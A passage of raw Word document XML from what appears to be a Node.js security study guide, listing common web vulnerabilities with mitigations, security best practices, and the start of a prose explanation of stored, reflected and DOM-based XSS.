          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>NoSQL Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Similar to SQL injection but affects NoSQL databases (e.g., MongoDB). Attackers can exploit improperly sanitized queries to manipulate the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE62D69" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="520"/>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Validate and sanitize inputs before using them in queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F68D428"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2. Cross-Site Scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739FF984" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="521"/>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Occurs when attackers inject malicious scripts into web pages viewed by other users. This can lead to data theft, session hijacking, and other malicious actions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3427E0" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="521"/>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Sanitize and escape user inputs before rendering them in HTML, use libraries like DOMPurify for client-side sanitization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEA9E01"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3. Cross-Site Request Forgery (CSRF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BC8035" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52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An attack where a malicious site tricks users into performing actions on a different site where they are authenticated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8F1DD5" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="522"/>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Use anti-CSRF tokens for state-changing requests, and validate the Origin or Referer headers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C787781"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4. Insecure Direct Object References (IDOR)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748D64E7" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="523"/>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Occurs when attackers manipulate input parameters to access unauthorized objects or resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F64F856" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="523"/>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Implement proper authorization checks to ensure users can only access resources they are permitted to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F97F65A"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5. Broken Authentication and Session Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D29EF4" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="524"/>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Weak authentication mechanisms or improper session management can lead to unauthorized access and session hijacking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5228E2B0" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="524"/>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Use strong, up-to-date authentication mechanisms (e.g., OAuth, JWT), ensure secure cookie settings (e.g., HttpOnly, Secure flags), and implement proper session expiration and renewal practices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058D50EF"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6. Security Misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19668FE2" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="525"/>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Poorly configured security settings can expose applications to various risks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAA8747" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="525"/>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Regularly review and update configuration settings, avoid using default credentials, and implement least privilege principles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F146EC8"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7. Sensitive Data Exposure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEACD25" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="526"/>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Failure to properly secure sensitive data (e.g., passwords, personal information) can lead to data breaches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CCB9CB" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="526"/>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Encrypt sensitive data at rest and in transit, use secure hashing algorithms for passwords (e.g., bcrypt), and avoid exposing sensitive data in logs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600060CF"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8. Broken Access Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098ECAA8" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="527"/>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Inadequate restrictions on what users can do or access, leading to unauthorized actions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46014042" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="527"/>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Implement proper access control mechanisms, enforce authorization checks, and validate user permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390B0AC7"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9. Using Vulnerable Dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A95639" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="528"/>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Dependencies with known security vulnerabilities can expose your application to attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365DB20F" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="528"/>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Regularly update dependencies, use tools like npm audit to identify vulnerabilities, and avoid using deprecated or unmaintained packages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4384ABE9"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10. Denial of Service (DoS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C3E7E7" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52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Attacks designed to overwhelm resources, making the service unavailable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA47617" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="529"/>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Implement rate limiting, use DDoS protection services, and validate user inputs to prevent resource exhaustion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49531CC8"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11. Code Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148408FD" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="530"/>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Attackers inject code into your application, which is then executed by the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28598DB4" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="530"/>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Avoid using eval(), exec(), or other functions that execute dynamic code. Always validate and sanitize user inputs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9E0A49"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12. Unvalidated Redirects and Forwards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFD4877" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="531"/>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Redirects or forwards that can be manipulated to direct users to malicious sites.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D1F50B" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="531"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Mitigation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Validate redirect URLs against a whitelist of trusted domains, and avoid allowing user input to control redirects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB26B7C"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Best Practices for Securing Node.js Applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D22846" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="532"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Input Validation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Always validate and sanitize user inputs to prevent injection attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675FD00E" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="532"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use HTTPS</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Ensure that data transmitted between clients and servers is encrypted using HTTPS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BDA5FD" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="532"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Environment Variables</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Store sensitive information such as API keys and credentials in environment variables, not hard-coded in the source code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4395D33F" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="532"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Error Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Avoid exposing stack traces and internal error messages to users; handle errors securely and log them for internal review.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D5E6C9" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="532"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Security Headers</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Implement security headers like Content-Security-Policy, X-Content-Type-Options, and X-Frame-Options to enhance security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A03911F" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="532"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Regular Updates</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Keep Node.js, dependencies, and libraries up to date with security patches and updates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E345E0" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="532"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Security Testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Regularly perform security assessments, penetration testing, and vulnerability scanning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F13D8E" w14:textId="77777777" w:rsidR="00EB2BF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00EB2BF7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B5311B2" w14:textId="773FEAC1" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="156" w:name="_Toc178383338"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Explain XSS attacks and how to prevent it.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="156"/>
    </w:p>
    <w:p w14:paraId="35FFB3B9" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Cross-Site Scripting (XSS)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a type of security vulnerability found in web applications where an attacker injects malicious scripts into content that other users will view. XSS attacks can compromise the security and integrity of a website, potentially leading to data theft, session hijacking, and other malicious activities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9E8478"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Types of XSS Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354CB547" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="533"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Stored XSS (Persistent XSS)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD33BC9" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="533"/>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Malicious scripts are injected and stored on the server (e.g., in a database). When users load the affected page, the script is executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A9636F" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="53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 attacker posts a comment with a malicious script, and every user who views the comment has the script executed in their browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21589C3A" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="533"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Reflected XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6E1D22" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="533"/>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The malicious script is reflected off the web server, often through URL parameters. The script is executed when the user clicks a specially crafted link.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6086CF" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="53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 attacker sends a URL with a malicious script embedded in a query string. When a user clicks the link, the script executes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7820646D" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="533"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>DOM-Based XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB99067" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="533"/>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The vulnerability exists in the client-side code (JavaScript) and is triggered when the script manipulates the DOM in an unsafe manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E57AFD" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="533"/>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An attacker tricks a user into loading a page where JavaScript reads data from the URL and directly inserts it into the HTML without sanitization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58ABFEE5"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How XSS Attacks Work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595E7FDD" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="534"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
